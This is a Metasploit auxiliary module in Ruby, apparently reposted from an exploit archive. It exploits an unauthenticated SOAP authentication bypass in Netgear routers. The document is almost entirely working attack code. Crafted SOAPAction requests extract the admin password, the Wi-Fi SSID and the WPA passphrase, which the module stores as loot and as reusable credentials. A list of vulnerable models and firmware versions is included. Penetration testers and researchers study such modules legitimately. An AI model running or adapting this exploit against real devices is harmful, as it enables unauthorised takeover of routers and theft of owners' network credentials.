Share
## https://sploitus.com/exploit?id=PACKETSTORM:180851
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
  
def initialize  
super(  
'Name' => 'Netgear Unauthenticated SOAP Password Extractor',  
'Description' => %q{  
This module exploits an authentication bypass vulnerability in different Netgear devices.  
It allows to extract the password for the remote management interface. This module has been  
tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:  
NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,  
NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),  
NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),  
NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),  
NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),  
NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),  
NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),  
NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),  
NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),  
NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),  
NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)  
},  
'References' => [  
[ 'BID', '72640' ],  
[ 'OSVDB', '118316' ],  
[ 'URL', 'https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR' ]  
],  
'Author' => [  
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery  
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module  
'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => 'Feb 11 2015'  
)  
end  
  
def run  
print_status('Trying to access the configuration of the device')  
  
# extract device details  
action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'  
print_status('Extracting Firmware version...')  
extract_data(action)  
  
# extract credentials  
action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'  
print_status('Extracting credentials...')  
extract_data(action)  
  
# extract wifi info  
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'  
print_status('Extracting Wifi...')  
extract_data(action)  
  
# extract WPA info  
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'  
print_status('Extracting WPA Keys...')  
extract_data(action)  
end  
  
def extract_data(soap_action)  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => '/',  
'headers' => {  
'SOAPAction' => soap_action  
},  
'data' => '='  
})  
  
return if res.nil?  
return if res.code == 404  
return if res.headers['Server'].nil?  
# unknown if other devices have other Server headers  
return if res.headers['Server'] !~ %r{Linux/2.6.15 uhttpd/1.0.0 soap/1.0}  
  
if res.body =~ %r{<NewPassword>(.*)</NewPassword>}  
print_status('Credentials found, extracting...')  
extract_credentials(res.body)  
end  
  
if res.body =~ %r{<ModelName>(.*)</ModelName>}  
model_name = ::Regexp.last_match(1)  
print_good("Model #{model_name} found")  
end  
  
if res.body =~ %r{<Firmwareversion>(.*)</Firmwareversion>}  
firmware_version = ::Regexp.last_match(1)  
print_good("Firmware version #{firmware_version} found")  
  
# store all details as loot  
loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)  
print_good("Device details downloaded to: #{loot}")  
end  
  
if res.body =~ %r{<NewSSID>(.*)</NewSSID>}  
ssid = ::Regexp.last_match(1)  
print_good("Wifi SSID: #{ssid}")  
end  
  
if res.body =~ %r{<NewBasicEncryptionModes>(.*)</NewBasicEncryptionModes>}  
wifi_encryption = ::Regexp.last_match(1)  
print_good("Wifi Encryption: #{wifi_encryption}")  
end  
  
if res.body =~ %r{<NewWPAPassphrase>(.*)</NewWPAPassphrase>}  
wifi_password = ::Regexp.last_match(1)  
print_good("Wifi Password: #{wifi_password}")  
end  
rescue ::Rex::ConnectionError  
vprint_error('Failed to connect to the web server')  
return  
end  
  
def extract_credentials(body)  
body.each_line do |line|  
next unless line =~ %r{<NewPassword>(.*)</NewPassword>}  
  
pass = ::Regexp.last_match(1)  
print_good("admin / #{pass} credentials found")  
  
connection_details = {  
module_fullname: fullname,  
private_data: pass,  
private_type: :password,  
username: 'admin',  
status: Metasploit::Model::Login::Status::UNTRIED  
}.merge(service_details)  
create_credential_and_login(connection_details)  
end  
  
# store all details as loot  
loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body)  
print_good("Account details downloaded to: #{loot}")  
end  
end